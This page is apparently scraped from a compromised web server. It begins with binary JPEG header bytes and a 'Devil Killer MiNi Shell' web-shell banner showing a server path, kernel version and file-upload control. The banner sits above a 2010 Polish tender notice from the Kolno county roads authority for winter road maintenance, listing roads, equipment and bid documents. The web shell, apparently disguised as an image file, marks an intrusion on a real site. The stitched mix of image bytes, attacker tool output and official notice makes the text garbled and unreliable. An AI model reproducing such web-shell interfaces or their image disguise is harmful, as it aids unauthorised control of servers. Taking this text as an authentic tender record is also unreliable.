JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101012/327808-N-2010.html

<p class="kh_header"><b>Kolno: Zimowe utrzymanie dróg będących w utrzymaniu Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011</b><br>
<b>Numer ogłoszenia: 327808 - 2010; data zamieszczenia: 12.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Kolnie , ul. Wojska Polskiego 48, 18-500 Kolno, woj. podlaskie, tel. 086 4742126, faks 086 4742126.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg będących w utrzymaniu Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zimowe utrzymanie dróg będących w utrzymaniu    Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011, który podzielony został na n/w zadania:

Zadanie nr 1: Wykaz dróg do utrzymania
Dr. nr 1830B Stawiski- Jurzec Wł. - Kossaki - Jedwabne
Dr. nr 1821B Stawiski (ul.Polowa) - Rogale - Sokoły - Romany -  Wilamowo - Słucz
Dr. nr 1829B  Romany do dr. nr 648
Dr. nr 1831B Lisy - Rostki  do dr. 1830B
Dr. nr 1832B Rostki - Mieczki -Sucholaszczki
Dr. nr 1855B Kobylin - Wysokie Wielkie - Rogienice Piaseczne do dr. nr 1895B
Dr. nr 1856B Poryte Szlacheckie - Hipolitowo - Budy Poryckie - Budy Stawiskie 
                  do dr. nr 61
Dr. nr 1857B Budy Poryckie - Ignacewo - Zaborowo - Karwowo do dr. nr 61
Dr. nr 1863B Kuczyny - Barżykowo

długość dróg objętych usługą -   44,1 km

Zadanie nr 2: Wykaz dróg do utrzymania
Dr. nr 1828B Świdry - Gnatowo - Siwki - Wilamowo 
Dr. nr 1870B Grabowo - Golanki - Żebrki - Surały - Brzeźno - Niedźwiadna
Dr. nr 1871B Surały do dr. nr 61
Dr. nr 1827B Ławsk - Gnatowo - Kurkowo - Romany
Dr. nr 1862B Grabowo - Konopki Monety do dr. nr 61
Dr. nr 1867B Grabowo - Guty Stare
Dr. nr 1872B Przyborowo - Marki do dr. nr 1870B
Dr. nr 1868B Grabowo - Przyborowo - Andrychy - Chełchy - Milewo do dr. nr 1869B

długość dróg objętych usługą -  43,7 km

Zadanie nr 3: Wykaz dróg do utrzymania
Dr. nr 1858B Poryte Wł. - Rudka - Dzierzbia do dr. nr 647
Dr. nr 1860B Rudka - Zaskrodzie - Wścieklice do dr. nr 647
Dr. nr 1878B Lachowo - Danowo - Filipki Wielkie - Filipki Małe
Dr. nr 1879B Wincenta - Górskie - Lachowo
Dr. nr 1880B Kolno (ul. Konopnickiej) - Górskie
Dr. nr 1881B Bialiki - Wykowo - Brzozowo - Nowe Brzózki
Dr. nr 1887B Ksebki - gr. woj. - Piątkowizna
Dr. nr 1888B Turośl - Krusza - Charubin
Dr. nr 1889B Turośl - Cieciory - Poredy - Dobrylas - Dębniki
Dr. nr 1864B Wiszowate - Skroda Wielka - Skroda Mała do dr. nr 647
Dr. nr 1865B Koziki - Olszyny do dr. nr 647
Dr. nr 1876B Kumelsk - Kowalewo
Dr. nr 1877B Kumelsk - Truszki - Glinki do dr. nr 1869B
Dr. nr 1882B Żebry - Okurowo - Brzózki
Dr. nr 1883B Czerwone - Kozioł - Łacha - Zimna - Leman - Ksebki - Cieloszka do 	   dr. nr 647
Dr. nr 1891B Kolno - Janowo - Łosewo - Niksowizna - Piasutno Żelazne - Dobrylas
Dr. nr 1869B Szczuczyn -Niedźwiadna -Kurki-Milewo -Kumelsk -Lachowo -
                  Gromadzyn St.-dr. 647 
Dr. nr 1861B Świdry - Grabowo -Wiszowate - Rydzewo Świątki - Tyszki Łabno dr. nr 647
Dr. nr 1885B Dr. nr 647 - Nowa Ruda
Dr. nr 1886B Od dr. nr 1883B - Wanacja
Dr. nr 1890B Od dr. nr 647 - Kolimagi - Gietki - Piasutno - dr. 1891B

długość dróg objętych usługą - 177,9 km

Zadanie nr 4: Wykaz dróg do utrzymania
Dr. nr 1898B Od dr. nr 63 - Mały Płock - Mściwuje - Kąty
Dr. nr 1900B Piątnica Poduchowna - Czarnocin - Penza - Nagórki - Chludnie - Kupnina - Serwatki
Dr. nr 1901B Mały Płock - Popki- Chludnie
Dr. nr 1892B Od dr. nr 648 - Rudka Skroda
Dr. nr 1894B Od dr. nr 63 - Rakowo Stare - Wygrane - Kozłówka- Mały Płock - 			          Budy Żelazne - Józefowo
Dr. nr 1895B Rogienice Wielkie - Rogienice Wypychy - Kołaki W. - Mały Płock
Dr. nr 1896B Od dr. nr 1891B- Ruda Skroda - do dr. nr 648
Dr. nr 1897B Rogienice Wielkie - Górki
Dr. nr 1899B Mściwuje - Cwaliny Małe
Dr. nr 1902B Rogienice Wielkie - Waśki
Dr. nr 1903B Rogienice Wielkie - Murawy - Kisielnica

długość dróg objętych usługą - 47,3 km.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% wszystkich usług                 wymienionych w przedmiocie zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać lub mieć zapewniony dostęp do pełni sprawnych jednostek podstawowego sprzętu i jednostek transportowych niezbędnych do realizacji niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, a w szczególności (minimum): 

Zadanie Nr 1 

ODŚNIEŻANIE:
- Ciągnik ciężki z pługiem czołowym o mocy min. 130 KM - szt. 3
- Ładowarka - szt. 1

ZWALCZANIE ŚLISKOŚCI:
- Piaskarka - szt. 1

Zadanie Nr 2 

ODŚNIEŻANIE:
- Ciągnik ciężki z pługiem czołowym o mocy min. 130 KM - szt. 3
- Ładowarka - szt. 1

Zadanie Nr 3 

ODŚNIEŻANIE:
- Samochód ciężarowy z pługiem czołowym - szt. 3
- Ciągnik ciężki z pługiem czołowym o mocy min. 130 KM - szt. 1
- Ładowarka - szt. 2
- Równiarka drogowa - szt. 1
 
Zadanie Nr 4 

ODŚNIEŻANIE:
- Ciągnik ciężki z pługiem czołowym o mocy min. 130 KM - szt. 3
- Ładowarka - szt. 1

ZWALCZANIE ŚLISKOŚCI:
- Piaskarka - szt. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk oferty wraz z kosztorysem (Formularz 2.1.)
2. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Formularz 3.1.2.)
3. Wykaz części zamówienia, które będą powierzone podwykonawcom (Formularz 3.1.3.)
4. Wykaz sprzętu niezbędnego do zrealizowania zamówienia (Formularz 3.1.4.)
5. Pełnomocnictwo (w przypadku podmiotów występujących wspólnie)
6. Zaakceptowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.st.kolno.wrotapodlasia.pl/ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Kolnie
ul. Wojska Polskiego 48
18-500 Kolno
pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Kolnie
ul. Wojska Polskiego 48
18-500 Kolno
pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg będących w utrzymaniu Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zimowe utrzymanie dróg będących w utrzymaniu    Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011:

Zadanie nr 1: Wykaz dróg do utrzymania
Dr. nr 1830B Stawiski- Jurzec Wł. - Kossaki - Jedwabne
Dr. nr 1821B Stawiski (ul.Polowa) - Rogale - Sokoły - Romany -  Wilamowo - Słucz
Dr. nr 1829B  Romany do dr. nr 648
Dr. nr 1831B Lisy - Rostki  do dr. 1830B
Dr. nr 1832B Rostki - Mieczki -Sucholaszczki
Dr. nr 1855B Kobylin - Wysokie Wielkie - Rogienice Piaseczne do dr. nr 1895B
Dr. nr 1856B Poryte Szlacheckie - Hipolitowo - Budy Poryckie - Budy Stawiskie 
                  do dr. nr 61
Dr. nr 1857B Budy Poryckie - Ignacewo - Zaborowo - Karwowo do dr. nr 61
Dr. nr 1863B Kuczyny - Barżykowo

długość dróg objętych usługą -   44,1 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie dróg będących w utrzymaniu Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zimowe utrzymanie dróg będących w utrzymaniu    Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011:
Zadanie nr 2: Wykaz dróg do utrzymania
Dr. nr 1828B Świdry - Gnatowo - Siwki - Wilamowo 
Dr. nr 1870B Grabowo - Golanki - Żebrki - Surały - Brzeźno - Niedźwiadna
Dr. nr 1871B Surały do dr. nr 61
Dr. nr 1827B Ławsk - Gnatowo - Kurkowo - Romany
Dr. nr 1862B Grabowo - Konopki Monety do dr. nr 61
Dr. nr 1867B Grabowo - Guty Stare
Dr. nr 1872B Przyborowo - Marki do dr. nr 1870B
Dr. nr 1868B Grabowo - Przyborowo - Andrychy - Chełchy - Milewo do dr. nr 1869B

długość dróg objętych usługą -  43,7 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie dróg będących w utrzymaniu Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zimowe utrzymanie dróg będących w utrzymaniu    Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011:
Zadanie nr 3: Wykaz dróg do utrzymania
Dr. nr 1858B Poryte Wł. - Rudka - Dzierzbia do dr. nr 647
Dr. nr 1860B Rudka - Zaskrodzie - Wścieklice do dr. nr 647
Dr. nr 1878B Lachowo - Danowo - Filipki Wielkie - Filipki Małe
Dr. nr 1879B Wincenta - Górskie - Lachowo
Dr. nr 1880B Kolno (ul. Konopnickiej) - Górskie
Dr. nr 1881B Bialiki - Wykowo - Brzozowo - Nowe Brzózki
Dr. nr 1887B Ksebki - gr. woj. - Piątkowizna
Dr. nr 1888B Turośl - Krusza - Charubin
Dr. nr 1889B Turośl - Cieciory - Poredy - Dobrylas - Dębniki
Dr. nr 1864B Wiszowate - Skroda Wielka - Skroda Mała do dr. nr 647
Dr. nr 1865B Koziki - Olszyny do dr. nr 647
Dr. nr 1876B Kumelsk - Kowalewo
Dr. nr 1877B Kumelsk - Truszki - Glinki do dr. nr 1869B
Dr. nr 1882B Żebry - Okurowo - Brzózki
Dr. nr 1883B Czerwone - Kozioł - Łacha - Zimna - Leman - Ksebki - Cieloszka do 	   dr. nr 647
Dr. nr 1891B Kolno - Janowo - Łosewo - Niksowizna - Piasutno Żelazne - Dobrylas
Dr. nr 1869B Szczuczyn -Niedźwiadna -Kurki-Milewo -Kumelsk -Lachowo -
                  Gromadzyn St.-dr. 647 
Dr. nr 1861B Świdry - Grabowo -Wiszowate - Rydzewo Świątki - Tyszki Łabno dr. nr 647
Dr. nr 1885B Dr. nr 647 - Nowa Ruda
Dr. nr 1886B Od dr. nr 1883B - Wanacja
Dr. nr 1890B Od dr. nr 647 - Kolimagi - Gietki - Piasutno - dr. 1891B

długość dróg objętych usługą - 177,9 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zimowe utrzymanie dróg będących w utrzymaniu Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zimowe utrzymanie dróg będących w utrzymaniu    Powiatu Kolneńskiego administrowanych przez Powiatowy Zarząd Dróg w Kolnie w sezonie zimowym 2010/2011:
Zadanie nr 4: Wykaz dróg do utrzymania
Dr. nr 1898B Od dr. nr 63 - Mały Płock - Mściwuje - Kąty
Dr. nr 1900B Piątnica Poduchowna - Czarnocin - Penza - Nagórki - Chludnie - Kupnina - Serwatki
